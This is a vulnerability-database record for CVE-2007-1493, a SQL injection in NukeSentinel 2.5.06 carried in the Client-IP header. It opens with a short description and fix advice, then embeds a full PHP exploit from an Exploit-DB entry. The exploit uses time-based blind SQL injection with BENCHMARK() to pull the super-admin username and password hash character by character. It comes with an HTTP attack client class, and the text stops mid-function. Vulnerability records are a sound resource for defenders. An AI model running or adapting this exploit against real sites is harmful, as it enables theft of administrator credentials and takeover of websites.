ID CVE-2007-1493 Type cve Reporter cve@mitre.org Modified 2018-10-16T16:38:00
Description
nukesentinel.php in NukeSentinel 2.5.06 and earlier uses a permissive regular expression to validate an IP address, which allows remote attackers to execute arbitrary SQL commands via the Client-IP HTTP header, due to an incomplete patch for CVE-2007-1172. (As the quoted 2.5.06 check shows, the dotted-quad pattern is anchored only at the start of the header value, so any trailing characters after a valid-looking address still pass validation and the unescaped value is then interpolated into the tracked-IP INSERT statement; anchoring the pattern at both ends or validating with ip2long(), and passing the value as a bound query parameter, closes the gap.)
{"exploitdb": [{"lastseen": "2016-01-31T18:30:40", "description": "NukeSentinel = 4.0.24) Remote SQL Injection Exploit. CVE-2007-1493. Webapps exploit for php platform", "published": "2007-03-10T00:00:00", "type": "exploitdb", "title": "NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1493"], "modified": "2007-03-10T00:00:00", "id": "EDB-ID:3450", "href": "https://www.exploit-db.com/exploits/3450/", "sourceData": "#!/usr/bin/php\r\n<?php\r\nerror_reporting(E_ALL ^ E_NOTICE);\r\n\r\nif($argc < 3)\r\n{\r\nprint(\"\r\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\r\n-----------------------------------------------------------------------\r\nPHP conditions: none\r\nCMS conditions: disable_switch<=0 (module activated), track_active=1\r\n Credits: DarkFig <gmdarkfig@gmail.com>\r\n URL: http://www.acid-root.new.fr/\r\n-----------------------------------------------------------------------\r\n Usage: $argv[0] -url <> [Options]\r\n Params: -url For example http://victim.com/phpnuke/ \r\nOptions: -prefix Table prefix (default=nuke)\r\n -debug Debug mod activated (debug_ns.html)\r\n -truetime Server response time which returns true\r\n -benchmark You can change the value used in benchmark()\r\n -proxy If you wanna use a proxy <proxyhost:proxyport> \r\n -proxyauth Basic authentification <proxyuser:proxypwd>\r\nExample: $argv[0] -url http://localhost/phpnuke/ -debug\r\n Note: This exploit is based on the server response time\r\n If you have some problems use -debug, -benchmark, -truetime\r\n-----------------------------------------------------------------------\r\n\");exit(1);\r\n}\r\n\r\n$url = getparam(\"url\",1);\r\n$tblprfix = (getparam(\"prefix\")!=\"\") ? getparam(\"prefix\") : 'nuke';\r\n$debug = (getparam(\"debug\")!=\"\") ? 1 : 0;\r\n$benchmark = (getparam(\"benchmark\")!=\"\") ? 
getparam(\"benchmark\") : '100000000';\r\n$proxy = getparam(\"proxy\");\r\n$proxyauth = getparam(\"proxyauth\");\r\n\r\n$xpl = new phpsploit();\r\n$xpl->agent('Mozilla Firefox');\r\n$xpl->allowredirection(0);\r\n$xpl->cookiejar(0);\r\n\r\nif($proxy) $xpl->proxy($proxy);\r\nif($proxyauth) $xpl->proxyauth($proxyauth);\r\nif($debug) debug(1);\r\n\r\nprint \"\\nUsername: \";bruteforce('aid');\r\nprint \"\\nPassword: \";bruteforce('pwd');\r\nexit(0);\r\n\r\nfunction bruteforce($field)\r\n{\r\n\tglobal $url,$xpl,$tblprfix,$truetime,$debug,$benchmark,$sql,$bef,$aft,$fak,$b,$c,$f,$dfield,$a,$result; \r\n\t$a=0;$v='';$dfield=$field;\r\n\t\r\n\tif(eregi('a',$field)) { $b='-1';$c='127';} # aid charset\r\n\telse { $b='46';$c='70'; } # pwd charset\r\n\t\r\n\twhile(TRUE)\r\n\t{\r\n\t\t$a++;\r\n\t\tfor($e=$b;$e<=$c;$e++)\r\n\t\t{\r\n\t\t\t$fak = rand(128,254).'.'\r\n\t\t\t .rand(128,254).'.'\r\n\t\t\t .rand(128,254).'.'\r\n\t\t\t .rand(128,254);\r\n\r\n if($e==$b) $f=\"TST\";\r\n\t\t\telseif($e==($b+1)) $f=\"NULL\";\r\n\t\t\telse $f=$e;\r\n\r\n # $db->sql_query(\"INSERT INTO `\".$prefix.\"_nsnst_tracked_ips` (`user_id`, `username`, `date`,\r\n # `ip_addr`, `ip_long`, `page`, `user_agent`, `refered_from`, `x_forward_for`, `client_ip`, `remote_addr`,\r\n # `remote_port`, `request_method`, `c2c`) VALUES ('\".$nsnst_const['ban_user_id'].\"', '$ban_username2',\r\n # '\".$nsnst_const['ban_time'].\"', '\".$nsnst_const['remote_ip'].\"', '\".$nsnst_const['remote_long'].\"',\r\n # '$pg', '$user_agent', '$refered_from', '\".$nsnst_const['forward_ip'].\"', '\".$nsnst_const['client_ip'].\"',\r\n # '\".$nsnst_const['remote_addr'].\"', '\".$nsnst_const['remote_port'].\"', '\".$nsnst_const['request_method'].\"',\r\n # '$c2c')\");\r\n #\r\n\t\t\t$sql = \"(SELECT IF((SUBSTR(\";\r\n\t\t\t$sql .= ($f==\"TST\") ? \"(SELECT 1)\" : \"(SELECT $field FROM ${tblprfix}_authors WHERE radminsuper=1)\";\r\n\t\t\t$sql .= ($f==\"TST\") ? 
\",1\" : \",$a\";\r\n\t\t\t$sql .= \",1)=CHAR(\";\r\n\t\t\t$sql .= ($f==\"TST\") ? \"49\" : \"$f\";\r\n\t\t\t$sql .= \")),BENCHMARK($benchmark,CHAR(66))\";\r\n\t\t\t$sql .= \",1)),1,1,1,1,1,1,1,1,1)/*\";\r\n\r\n\t\t\t$bef = time();\r\n\t\t\t$xpl->reset(\"header\");\r\n\t\t\t\r\n\t\t\t# 2.5.06 CHANGES (2007-03-02):\r\n\t\t\t# + Corrected a problem causing valid ip users to be tagged as invalid users\r\n # ...The old sploit will not work for this version but it's always vulnerable, you missed something.\r\n #\r\n\t\t\t# if(!ereg(\"^([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\\\\.([0-9]{1,3})\", $nsnst_const['remote_ip']))\r\n # {$nsnst_const['remote_ip'] = \"none\"; }\r\n\t\t\t#\r\n\t\t\t$xpl->addheader(\"Client-IP\",\"$fak',$sql\");\r\n\t\t\t$xpl->get($url);\r\n\t\t\t$aft = time();\r\n\r\n\t\t\tif($f==\"TST\") $truetime=($aft-$bef);\r\n\t\t\tif(getparam(\"truetime\")!=\"\") $truetime = getparam(\"truetime\");\r\n\t\t\t\r\n\t\t\tif((($aft-$bef) >= $truetime) AND ($f != \"TST\")) $result='TRUE';\r\n\t\t\telse $result='FALSE';\r\n\t\t\tif($debug) debug();\r\n\t\t\t\r\n\t\t\tif($result=='TRUE')\r\n\t\t\t{\r\n\t\t\t\tif($f != \"NULL\")\r\n\t\t\t\t{\r\n\t\t\t\t\tprint strtolower(chr($f));\r\n\t\t\t\t\t$v .= chr($f);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $v;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t# Retry if no char found\r\n\t\t\tif($f==$c) $a--;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nfunction debug($first='')\r\n{\r\n\tglobal $tblprfix,$truetime,$debug,$benchmark,$sql,$bef,$aft,$fak,$b,$c,$f,$dfield,$a,$result;\r\n\tif($first)\r\n\t{\r\n\t\t$handle = fopen(\"debug_ns.html\",\"w+\");\r\n\t\t$data = \"<h1><div align='center'>NukeSentinel <= 2.5.06 SQL Injection (Debug)</div></h1>\r\n\t\t<pre><table width='0' border='1' align='center' cellspacing='0'><tr>\r\n\t\t<td align='center'><b>REQUEST TIME</b></td>\r\n\t\t<td align='center'><b>RESPONSE TIME</b></td>\r\n\t\t<td align='center'><b>TRUETIME</b></td>\r\n\t\t<td 
align='center'><b>BENCHMARK</b></td>\r\n\t\t<td align='center'><b>RESULT</b></td>\";\r\n\t\t# <td align='center'><b>IP</b></td>\r\n\t\t$data .= \"<td align='center'><b>FIELD</b></td>\r\n\t\t<td align='center'><b>CHARSET</b></td>\r\n\t\t<td align='center'><b>SUBSTR()</b></td>\r\n\t\t<td align='center'><b>ORD()</b></td>\r\n\t\t<td align='center'><b>CHAR()</b></td>\";\r\n\t\tfwrite($handle,$data);\r\n\t\tfclose($handle);\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$handle = fopen(\"debug_ns.html\",\"a\");\r\n\t\t$data = \"<tr\";\r\n\t\t$data .= ($result=='TRUE') ? \" bgcolor='#FFFF00'\" : \"\";\r\n\t\t$data .= \">\r\n\t\t<td align='center'> \".htmlentities($bef).\" </td>\r\n\t\t<td align='center'> \".htmlentities($aft).\" </td>\r\n\t\t<td align='center'> \".htmlentities($truetime).\" </td>\r\n\t\t<td align='center'> \".htmlentities($benchmark).\" </td>\r\n\t\t<td align='center'> \".htmlentities($result).\" </td>\";\r\n\t\t# <td align='center'> \".htmlentities($fak).\" </td>\r\n\t\t$data .= \"<td align='center'> \".htmlentities($dfield).\" </td>\r\n\t\t<td align='center'> \".htmlentities(\"$b-$c\").\" </td>\r\n\t\t<td align='center'> \".htmlentities($a).\" </td>\r\n\t\t<td align='center'> \".htmlentities($f).\" </td>\r\n\t\t<td align='center'> \".htmlentities(chr($f)).\" </td></tr>\";\r\n\t\tfwrite($handle,$data);\r\n\t\tfclose($handle);\r\n\t}\r\n}\r\n\r\nfunction getparam($param,$opt='')\r\n{\r\n\tglobal $argv;\r\n\tforeach($argv as $value => $key)\r\n\t{\r\n\t\tif($key == '-'.$param) {\r\n\t\t if(!empty($argv[$value+1])) return $argv[$value+1];\r\n\t\t else return 1;\r\n\t\t}\r\n\t}\r\n\tif($opt) exit(\"\\n-$param parameter required\");\r\n\telse return;\r\n}\r\n\r\n/*\r\n * \r\n * Copyright (C) darkfig\r\n * \r\n * This program is free software; you can redistribute it and/or \r\n * modify it under the terms of the GNU General Public License \r\n * as published by the Free Software Foundation; either version 2 \r\n * of the License, or (at your option) any later version. 
\r\n * \r\n * This program is distributed in the hope that it will be useful, \r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \r\n * GNU General Public License for more details. \r\n * \r\n * You should have received a copy of the GNU General Public License \r\n * along with this program; if not, write to the Free Software \r\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n * \r\n * TITLE: PhpSploit Class\r\n * REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)\r\n * VERSION: 1.2\r\n * LICENSE: GNU General Public License\r\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\r\n * FILENAME: phpsploitclass.php\r\n *\r\n * CONTACT: gmdarkfig@gmail.com (french / english)\r\n * GREETZ: Sparah, Ddx39\r\n *\r\n * DESCRIPTION:\r\n * The phpsploit is a class implementing a web user agent.\r\n * You can add cookies, headers, use a proxy server with (or without) a\r\n * basic authentification. It supports the GET and the POST method. It can\r\n * also be used like a browser with the cookiejar() function (which allow\r\n * a server to add several cookies for the next requests) and the\r\n * allowredirection() function (which allow the script to follow all\r\n * redirections sent by the server). It can return the content (or the\r\n * headers) of the request. 
Others useful functions can be used for debugging.\r\n * A manual is actually in development but to know how to use it, you can\r\n * read the comments.\r\n *\r\n * CHANGELOG:\r\n * [2007-01-24] (1.2)\r\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\r\n * * New: multipart/form-data enctype is now supported \r\n *\r\n * [2006-12-31] (1.1)\r\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\r\n * * New: You can now call the getheader() / getcontent() function without parameters\r\n *\r\n * [2006-12-30] (1.0)\r\n * * First version\r\n * \r\n */\r\n\r\nclass phpsploit {\r\n\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don't have to call it, this is the main function.\r\n\t *\r\n\t * @return $server_response\r\n\t */\r\n\tprivate function sock()\r\n\t{\r\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\r\n\t\telse $socket = fsockopen($this->host,$this->port);\r\n\t\t\r\n\t\tif(!$socket) die(\"Error: The host doesn't exist\");\r\n\t\t\r\n\t\tif($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";\r\n\t\telseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. 
\" HTTP/1.1\\r\\n\";\r\n\t\telse die(\"Error: Invalid method\");\r\n\t\t\r\n\t\tif(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";\r\n\t\t$this->packet .= \"Host: \".$this->host.\"\\r\\n\";\r\n\t\t\r\n\t\tif(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";\r\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";\r\n\t\tif(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";\r\n\t\t\r\n\t\t$this->packet .= \"Connection: Close\\r\\n\";\r\n\t\tif($this->method===\"post\")\r\n\t\t{\r\n\t\t\t$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\r\n\t\t\t$this->packet .= $this->data.\"\\r\\n\";\r\n\t\t}\r\n\t\telseif($this->method===\"formdata\")\r\n\t\t{\r\n\t\t\t$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";\r\n\t\t\t$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";\r\n\t\t\t$this->packet .= $this->data;\r\n\t\t}\r\n\t\t$this->packet .= \"\\r\\n\";\r\n\t\t$this->recv = '';\r\n\t\t\r\n\t\tfputs($socket,$this->packet);\r\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\r\n\t\tfclose($socket);\r\n\t\t\r\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\r\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\r\n\t\telse return $this->recv;\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to add several cookie in the\r\n\t * request. 
Several methods are supported:\r\n\t * \r\n\t * $this->addcookie(\"name\",\"value\");\r\n\t * or\r\n\t * $this->addcookie(\"name=newvalue\");\r\n\t * or\r\n\t * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");\r\n\t * \r\n\t * @param string $cookiename\r\n\t * @param string $cookievalue\r\n\t * \r\n\t */\r\n\tpublic function addcookie($cookn,$cookv='')\r\n\t{\r\n\t\t// $this->addcookie(\"name\",\"value\"); work avec replace\r\n\t\tif(!empty($cookv))\r\n\t\t{\r\n\t\t\tif($cookv === \"deleted\") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete\r\n\t\t\tif(!empty($this->cookie))\r\n\t\t\t{\r\n\t\t\t if(preg_match(\"/$cookn=/\",$this->cookie))\r\n\t\t\t {\r\n\t\t\t \t$this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);\r\n\t\t\t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".\r\n\t\t\t }\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->cookie = $cookn.\"=\".$cookv.\";\";\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addcookie(\"name=value; othername=othervalue\");\r\n\t\telse\r\n\t\t{\r\n\t \t if(!empty($this->cookie))\r\n\t \t {\r\n\t \t \t$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);\r\n\t \t \t$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));\r\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\r\n\t \t \t{\r\n\t \t \t\tpreg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);\r\n\t \t \t\t$cookn = $matches[1];\r\n\t \t \t\t$cookv = $matches[2];\r\n\t \t \t\t$this->addcookie($cookn,$cookv);\r\n\t \t \t}\r\n\t \t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";\r\n\t\t\t \t$this->cookie = $cookn;\t\t\t\r\n\t\t\t }\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to add several headers in the\r\n\t * request. 
Several methods are supported:\r\n\t *\r\n\t * $this->addheader(\"headername\",\"headervalue\");\r\n\t * or\r\n\t * $this->addheader(\"headername: headervalue\");\r\n\t *\r\n\t * @param string $headername\r\n\t * @param string $headervalue\r\n\t */\r\n\tpublic function addheader($headern,$headervalue='')\r\n\t{\r\n\t\t// $this->addheader(\"name\",\"value\");\r\n\t\tif(!empty($headervalue))\r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\tif(preg_match(\"/$headern:/\",$this->header))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern.\": \".$headervalue;\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addheader(\"name: value\");\r\n\t\telse \r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\t$headarr = explode(\": \",$headern);\r\n\t\t\t\t$headern = $headarr[0];\r\n\t\t\t\t$headerv = $headarr[1];\r\n\t\t\t\t$this->addheader($headern,$headerv);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server.\r\n\t * Several methods are supported:\r\n\t * \r\n\t * $this->proxy(\"proxyip\",\"8118\");\r\n\t * or\r\n\t * $this->proxy(\"proxyip:8118\")\r\n\t *\r\n\t * @param string $proxyhost\r\n\t * @param integer $proxyport\r\n\t */\r\n\tpublic function proxy($proxy,$proxyp='')\r\n\t{\r\n\t\t// $this->proxy(\"localhost:8118\");\r\n\t\tif(empty($proxyp))\r\n\t\t{\r\n\t\t\tpreg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);\r\n\t\t\t$proxh = $proxarr[1];\r\n\t\t\t$proxp = $proxarr[2];\r\n\t\t\t$this->proxyhost=$proxh;\r\n\t\t\t$this->proxyport=$proxp;\r\n\t\t}\r\n\t\t// $this->proxy(\"localhost\",8118);\r\n\t\telse 
\r\n\t\t{\r\n\t\t\t$this->proxyhost=$proxy;\r\n\t\t\t$this->proxyport=intval($proxyp);\r\n\t\t}\r\n\t\tif($this->proxyport > 65535) die(\"Error: Invalid port number\");\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server\r\n\t * which requires a basic authentification. Several\r\n\t * methods are supported:\r\n\t * \r\n\t * $this->proxyauth(\"darkfig\",\"dapasswd\");\r\n\t * or\r\n\t * $this->proxyauth(\"darkfig:dapasswd\");\r\n\t *\r\n\t * @param string $proxyuser\r\n\t * @param string $proxypass\r\n\t */\r\n\tpublic function proxyauth($proxyauth,$proxypasse='')\r\n\t{\r\n\t\t// $this->proxyauth(\"darkfig:password\");\r\n\t\tif(empty($proxypasse))\r\n\t\t{\r\n\t\t\tpreg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);\r\n\t\t\t$proxu = $proxautharr[1];\r\n\t\t\t$proxp = $proxautharr[2];\r\n\t\t\t$this->proxyuser=$proxu;\r\n\t\t\t$this->proxypass=$proxp;\r\n\t\t}\r\n\t\t// $this->proxyauth(\"darkfig\",\"password\");\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->proxyuser=$proxyauth;\r\n\t\t\t$this->proxypass=$proxypasse;\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function allows you to set the \"User-Agent\" header.\r\n\t * Several methods are possible to do that:\r\n\t * \r\n\t * $this->agent(\"Mozilla Firefox\");\r\n\t * or\r\n\t * $this->addheader(\"User-Agent: Mozilla Firefox\");\r\n\t * or\r\n\t * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");\r\n\t * \r\n\t * @param string $useragent\r\n\t */\r\n\tpublic function agent($useragent)\r\n\t{\r\n\t\t$this->agent=$useragent;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the header which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showheader();\r\n\t *\r\n\t * @return $header\r\n\t */\r\n\tpublic function showheader()\r\n\t{\r\n\t\treturn $this->header;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the cookie which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showcookie();\r\n\t *\r\n\t * @return $storedcookies\r\n\t 
*/\r\n\tpublic function showcookie()\r\n\t{\r\n\t\treturn $this->cookie;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the last formed\r\n\t * http request (the http packet).\r\n\t * \r\n\t * $this->showlastrequest();\r\n\t * \r\n\t * @return $last_http_request\r\n\t */\r\n\tpublic function showlastrequest()\r\n\t{\r\n\t\treturn $this->packet;\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * GET method. You can precise the port of the host.\r\n\t * \r\n\t * $this->get(\"http://localhost\");\r\n\t * $this->get(\"http://localhost:888/xd/tst.php\");\r\n\t * \r\n\t * @param string $urlwithpath\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function get($url)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\"get\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method. You can precise the port of the host.\r\n\t * \r\n\t * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");\r\n\t *\r\n\t * @param string $urlwithpath\r\n\t * @param string $postdata\r\n\t * @return $server_response\r\n\t */\t\r\n\tpublic function post($url,$data)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\"post\";\r\n\t\t$this->data=$data;\r\n\t\treturn $this->sock();\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method using the multipart/form-data enctype. 
\r\n\t * \r\n\t * $array = array(\r\n\t * frmdt_url => \"http://localhost/upload.php\",\r\n\t * frmdt_boundary => \"123456\", # Optional\r\n\t * \"email\" => \"me@u.com\",\r\n\t * \"varname\" => array(\r\n\t * frmdt_type => \"image/gif\", # Optional\r\n\t * frmdt_transfert => \"binary\", # Optional\r\n\t * frmdt_filename => \"hello.php\",\r\n\t * frmdt_content => \"<?php echo ':)'; ?>\"));\r\n\t * $this->formdata($array);\r\n\t *\r\n\t * @param array $array\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function formdata($array)\r\n\t{\r\n\t\t$this->target($array[frmdt_url]);\r\n\t\t$this->method=\"formdata\";\r\n\t\t$this->data='';\r\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";\r\n\t\telse $this->boundary=$array[frmdt_boundary];\r\n\t\tforeach($array as $key => $value)\r\n\t\t{\r\n\t\t\tif(!preg_match(\"#^frmdt_(boundary|url)#\",$key))\r\n\t\t\t{\r\n\t\t\t\t$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";\r\n\t\t\t\t$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\";\r\n\t\t\t\tif(!is_array($value))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";\r\n\t\t\t\t\t$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the content of the server response\r\n\t * without the headers.\r\n\t * \r\n\t * 
$this->getcontent($this->get(\"http://localhost/\"));\r\n\t * or\r\n\t * $this->getcontent();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlythecontent\r\n\t */\r\n\tpublic function getcontent($code='')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$content = explode(\"\\n\",$code);\r\n\t\t$onlycode = '';\r\n\t\tfor($i=1;$i<count($content);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;\r\n\t\t\tif($ok) $onlycode .= $content[$i].\"\\n\";\r\n\t\t}\r\n\t\treturn $onlycode;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the headers of the server response\r\n\t * without the content.\r\n\t * \r\n\t * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));\r\n\t * or\r\n\t * $this->getheader();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlytheheaders\r\n\t */\r\n\tpublic function getheader($code='')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$header = explode(\"\\n\",$code);\r\n\t\t$onlyheader = $header[0].\"\\n\";\r\n\t\tfor($i=1;$i<count($header);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\"/^(\\S*):/\",$header[$i])) break;\r\n\t\t\t$onlyheader .= $header[$i].\"\\n\";\r\n\t\t}\r\n\t\treturn $onlyheader;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the cookiejar() function.\r\n\t * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"\r\n\t * header for the next request. 
You don't have to call it.\r\n\t * \r\n\t * @param string $server_response\r\n\t */\r\n\tprivate function getcookie($code)\r\n\t{\r\n\t\t$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));\r\n\t\tfor($z=0;$z<count($carr);$z++)\r\n\t\t{\r\n\t\t\tif(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))\r\n\t\t\t{\r\n\t\t\t\t$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfor($i=0;$i<count($cookie);$i++)\r\n\t\t{\r\n\t\t\tpreg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);\r\n\t \t $cookn = $matches[1];\r\n\t \t $cookv = $matches[2];\r\n\t \t $this->addcookie($cookn,$cookv);\r\n\t\t}\r\n }\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don't have to call it.\r\n\t *\r\n\t * @param string $urltarg\r\n\t */\r\n\tprivate function target($urltarg)\r\n\t{\r\n\t\tif(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";\r\n\t\t$this->url=$urltarg;\r\n\t\t\r\n\t\t$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));\r\n\t\t$this->host=$array[0];\r\n\r\n\t\tpreg_match(\"/:(\\d+)\\//\",$urltarg,$matches);\r\n\t\t$this->port=empty($matches[1]) ? 
80 : $matches[1];\r\n\t\t\r\n\t\t$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));\r\n\t\tpreg_match(\"/\\/(.*)\\//\",$temp,$matches);\r\n\t\t$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");\r\n\t\r\n\t\tif($this->port > 65535) die(\"Error: Invalid port number\");\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * extract all \"Set-Cookie\" headers values\r\n\t * and it will automatically add them into the \"Cookie\" header\r\n\t * for all next requests.\r\n\t *\r\n\t * $this->cookiejar(1); // enabled\r\n\t * $this->cookiejar(0); // disabled\r\n\t * \r\n\t */\r\n\tpublic function cookiejar($code)\r\n\t{\r\n\t\tif($code===0) $this->cookiejar='';\r\n\t\tif($code===1) $this->cookiejar=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->getcookie($code);\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * follow all redirections sent by the server.\r\n\t * \r\n\t * $this->allowredirection(1); // enabled\r\n\t * $this->allowredirection(0); // disabled\r\n\t * \r\n\t * @return $this->get($locationresponse)\r\n\t */\r\n\tpublic function allowredirection($code)\r\n\t{\r\n\t\tif($code===0) $this->allowredirection='';\r\n\t\tif($code===1) $this->allowredirection=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\tif(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))\r\n\t\t\t{\r\n\t\t\t\t$location = 